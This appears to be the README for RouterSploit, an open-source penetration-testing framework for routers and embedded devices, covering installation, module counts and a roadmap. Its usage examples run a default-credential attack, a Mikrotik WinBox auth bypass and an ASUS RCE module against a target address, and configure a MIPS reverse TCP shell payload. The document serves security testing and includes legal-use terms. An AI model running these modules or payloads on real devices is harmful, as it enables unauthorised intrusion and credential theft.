Join community on Embedded Exploitation Discord.
# Launch the framework
python3 rsf.py
# Example: Test for default credentials
rsf > use creds/routers/asus/ssh_default_creds
rsf (SSH Default Creds) > set target 192.168.1.1
rsf (SSH Default Creds) > run
# Example: Exploit a vulnerability
rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass) > set target 192.168.1.1
rsf (Mikrotik WinBox Auth Bypass) > run
# Example: Generate payload
rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > set lhost 10.0.0.100
rsf (MIPSLE Reverse TCP) > set lport 4444
rsf (MIPSLE Reverse TCP) > run# Run specific module from command line
python3 rsf.py -m exploits/routers/asus/asuswrt_lan_rce -s "target 192.168.1.1"The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
RouterSploit provides a comprehensive toolkit for penetration testing embedded devices with 489 modules across 29 vendor families, making it one of the most extensive router security frameworks available.
- exploits (194 modules) - Target-specific vulnerability exploits for embedded devices
- creds (228 modules) - Credential testing modules for default and weak passwords
- scanners (8 modules) - Automated vulnerability detection and device fingerprinting
- payloads (42 modules) - Shellcode generation for multiple architectures
- generic (4 modules) - Universal attack modules for common services
- encoders (6 modules) - Payload encoding and evasion techniques
- ARM (Little Endian) - ARM-based routers and IoT devices
- MIPS (Big/Little Endian) - MIPS processors commonly found in routers
- x86/x64 - Intel-compatible embedded systems
- Generic - Architecture-independent exploits
ASUS, Belkin, Billion, Cisco, Comtrend, D-Link, Fortinet, Huawei, Linksys, Mikrotik, Netgear, TP-Link, Ubiquiti, ZTE, Zyxel, and 14+ additional vendors.
- OS: Linux (Kali, Ubuntu, Debian), macOS, Windows (WSL)
- Python: 3.6+ (tested up to 3.12)
- Memory: 512MB RAM minimum
- Storage: 100MB free space
Required:
- requests
- paramiko
- pysnmp
- pycrypto
Optional:
- bluepy - Bluetooth low energy support
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker compose up --build -d
docker attach routersploit
docker start routersploit
docker attach routersploit
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull
- ImportError: Ensure all dependencies are installed with
python3 -m pip install -r requirements.txt - Permission denied: Use
sudofor system-wide installation or install to user directory - Module not found: Verify Python path and that you're in the correct directory
- Network timeouts: Check target connectivity and firewall rules
- Use SSD storage for faster module loading
- Increase system file descriptor limits for concurrent scanning
- Consider running on dedicated penetration testing distributions
- Check the Documentation for detailed module usage
- Search existing Issues
- Join the Discord Community for support
- Review CONTRIBUTING.md for development guidelines
Legal Usage Requirements:
- Only test systems you own or have explicit written permission to test
- Comply with all applicable local, state, and federal laws
- Follow responsible disclosure practices for discovered vulnerabilities
- Use defensive techniques to verify and remediate security issues
The developers assume no liability for misuse or damage caused by this framework.
To our surprise, people started to fork routersploit not because they were interested in the security of embedded devices but simply because they want to leverage our interactive shell logic and build their tools using similar concept. All these years they must have said: "There must be a better way!" and they were completely right, the better way is called Riposte.
Riposte allows you to easily wrap your application inside a tailored interactive shell. Common chores regarding building REPLs was factored out and being taken care of so you can focus on specific domain logic of your application.
RouterSploit continues to evolve with the embedded security landscape. Planned improvements include:
- Enhanced IoT Support: Additional modules for smart home devices and industrial IoT
- AI-Powered Scanning: Machine learning integration for intelligent vulnerability detection
- Mobile Device Testing: Extended support for Android and iOS router management apps
- Cloud Router Support: Modules for cloud-managed networking infrastructure
- Protocol Fuzzing: Built-in protocol fuzzing capabilities for proprietary router protocols
- Automated Reporting: Professional-grade vulnerability reports and remediation guidance
- Plugin Architecture: Enhanced extensibility framework for custom module development
- Performance Optimization: Multi-threaded scanning and improved memory efficiency
- Zero-Day Research: Advanced vulnerability research tools and methodologies
- Integration APIs: RESTful APIs for integration with security orchestration platforms
- GUI Interface: Optional graphical interface for less technical users
- Enterprise Features: Role-based access, audit logging, and compliance reporting
We welcome contributions! See CONTRIBUTING.md for guidelines on:
- Creating new exploit modules
- Adding vendor support
- Improving scanner capabilities
- Enhancing payload generation
- Documentation improvements
Current Development Priorities:
- Python 3.12+ compatibility enhancements
- Bluetooth Low Energy (BLE) attack modules
- IPv6 support for modern network environments
- Container and microservice security testing
- Enhanced evasion and anti-detection techniques
The RouterSploit Framework is under a BSD license. Please see LICENSE for more details.
- riposte - Interactive shell framework
- The security research community for vulnerability discoveries and responsible disclosure
- All contributors who have helped improve RouterSploit with modules, bug fixes, and documentation
RouterSploit Framework v3.4.7 - Exploitation Framework for Embedded Devices
Codename: "I Knew You Were Trouble"
